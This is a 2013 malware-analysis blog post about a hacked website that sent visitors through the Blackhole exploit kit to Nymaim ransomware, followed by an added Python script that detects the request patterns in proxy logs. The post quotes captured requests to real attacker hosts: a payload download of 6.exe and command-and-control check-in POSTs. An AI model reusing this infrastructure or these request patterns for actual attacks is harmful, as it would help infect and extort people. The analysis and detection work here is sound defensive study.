Seeing as the website runs Apache version 2.2.3, released July 28 2006, and the HTTP headers kindly send out 'X-Powered-By: PleskLin', it's safe to say the site was compromised with the use of Darkleech.

@MalwareMustDie @campbellclaret Ouch....BHE redirect on alastaircampbell{.}org http://t.co/gnhLZ4fnWW best clean that up...
— CwacCwac (@CwacCwac) September 30, 2013
And, as is typical for Darkleech operators, the website serves the Blackhole exploit kit with a ransomware payload. The infection process:
The redirect to Blackhole was 'hidden' at the top of one of the WordPress jQuery includes: wp-includes/js/jquery/jquery.js?ver=1.10.2.
Blackhole:
GET /ac29f5935614fa1908bc610e2403d62c/software-eastern.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hxxp://www.alastaircampbell .org/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: 67.228.168.250
DNT: 1
Connection: Keep-Alive
Payload:
GET /6.exe HTTP/1.0
Host: main-firewalls.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
The payload hosted on main-firewalls.com is the Nymaim ransomware, which has apparently taken a turn for the worse: it now shows the infected person (child) porn and bestiality pictures that the victim allegedly viewed, much like the most recent version of Revoyem does, although Revoyem's pictures leave much less to the imagination.
The ransomware POSTs to the Russian domain instotsvin.ru (hosted on 208.115.114.69) to confirm the infection and retrieve the lock screen template:
POST /M8eori?EedoREFmhcuXm=uVqiAdENJTHSO&svGLYCeYnJhO=HjNkMDXOQEhI HTTP/1.1
Host: instotsvin.ru
Content-Length: 88
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Pragma: no-cache
Cache-Control: no-cache
Connection: close

filename=jbirgf.wfw&data=.....M..-2...n.'.....j...s*<.4....JD..&q......%..{;.uj...}.>J..

After further testing, more POSTs to 69.88.46.245 and 24.156.8.65 were also observed.
Below is an example of what the (Dutch) infection looks like, with the disturbing pictures blurred out.
This seems to be the default lock page, as Nymaim is also able to load a more user-specific page by searching for active torrent clients (Azureus, uTorrent, Mediaget, BitTorrent, BitComet) and for files with these extensions: .doc, .xls, .psd, .bmp, .jpg, .mpg, .mov, .rtf, .fla and .mp3. This information is then stored in compdata.js to be included on the lock page:
All credit to Jean-Ian Boutin and http://www.welivesecurity.com for the above information.
VirusTotal (16/46) for the dropper (6.exe):
https://www.virustotal.com/nl/file/e2d9c27f00a7a9743b088948fde6dcd0a08894e12001b292992b9c774311a610/analysis/1380553090/
VirusTotal (18/48) for the Nymaim infection (2767218.exe):
https://www.virustotal.com/nl/file/e2d9c27f00a7a9743b088948fde6dcd0a08894e12001b292992b9c774311a610/analysis/1380553177/
According to other analyses and infection testing, the first stage of Nymaim currently appears to always be named 6.exe!
After Blackhole was done spreading ransomware, it started spreading fake antivirus malware by the name of "Security Cleaner Pro".
A very detailed analysis of this FakeAV can be found at http://blog.0x3a.com/post/63080734846/analysis-of-the-security-cleaner-pro-fake-antivirus
For a more in-depth analysis of Nymaim: http://www.welivesecurity.com/2013/08/26/nymaim-obfuscation-chronicles
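As an added defender-side example (not code from the original post), the following script triages a constructed proxy log for the three request shapes seen in this infection chain: the Blackhole landing page (32-hex directory plus a hyphenated .php name), the 6.exe first stage noted above, and the Nymaim check-in POST with its random-letter query parameters. The regex shapes, the tab-separated log format and the benign/extra sample lines are assumptions; the hosts and IPs are the ones quoted in the post.

```python
import re

# Hosts and IPs quoted in the captured traffic above (taken from the post, not constructed).
KNOWN_BAD_HOSTS = {
    "67.228.168.250", "main-firewalls.com", "instotsvin.ru",
    "208.115.114.69", "69.88.46.245", "24.156.8.65",
}
# Blackhole landing page: 32-hex directory, then a hyphenated two-word .php name.
BLACKHOLE_LANDING = re.compile(r"^/[0-9a-f]{32}/[a-z]+-[a-z]+\.php$")
# Nymaim first stage: the post notes it is currently always fetched as 6.exe.
NYMAIM_DROPPER = re.compile(r"^/6\.exe$")
# Nymaim check-in: short random path plus random-letter key=value query pairs (assumed shape).
NYMAIM_BEACON = re.compile(r"^/[A-Za-z0-9]{4,10}\?(?:[A-Za-z]{8,16}=[A-Za-z]{8,16}&?)+$")

# Constructed proxy log (method, host, path; tab separated), built from the requests above.
SAMPLE_LOG = [
    "GET\twww.alastaircampbell.org\t/wp-includes/js/jquery/jquery.js?ver=1.10.2",
    "GET\t67.228.168.250\t/ac29f5935614fa1908bc610e2403d62c/software-eastern.php",
    "GET\tmain-firewalls.com\t/6.exe",
    "POST\tinstotsvin.ru\t/M8eori?EedoREFmhcuXm=uVqiAdENJTHSO&svGLYCeYnJhO=HjNkMDXOQEhI",
    "POST\t69.88.46.245\t/update",
]

def classify(method, host, path):
    """Return a verdict label for one request, or '' when nothing matches."""
    if method == "GET" and BLACKHOLE_LANDING.match(path):
        return "blackhole-landing"
    if method == "GET" and NYMAIM_DROPPER.match(path):
        return "nymaim-dropper"
    if method == "POST" and NYMAIM_BEACON.match(path):
        return "nymaim-c2-beacon"
    if host.lower() in KNOWN_BAD_HOSTS:  # fall back to the infrastructure seen in the post
        return "known-bad-host"
    return ""

def detect(lines):
    """Classify every log line; lines with too few fields are skipped, not fatal."""
    hits = []
    for line in lines:
        fields = line.rstrip("\n").split("\t")
        if len(fields) < 3:
            continue
        method, host, path = fields[0].upper(), fields[1], fields[2]
        verdict = classify(method, host, path)
        if verdict:
            hits.append((verdict, host, path))
    return hits
```

Running detect(SAMPLE_LOG) flags the four malicious lines and leaves the legitimate jquery.js fetch alone; the path-shape rules catch the chain even when the operators rotate hosts.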
Though alastaircampbell{.}org is no longer serving the exploit kit, the website still seems just as vulnerable as it was last week, so I wouldn't advise visiting the site.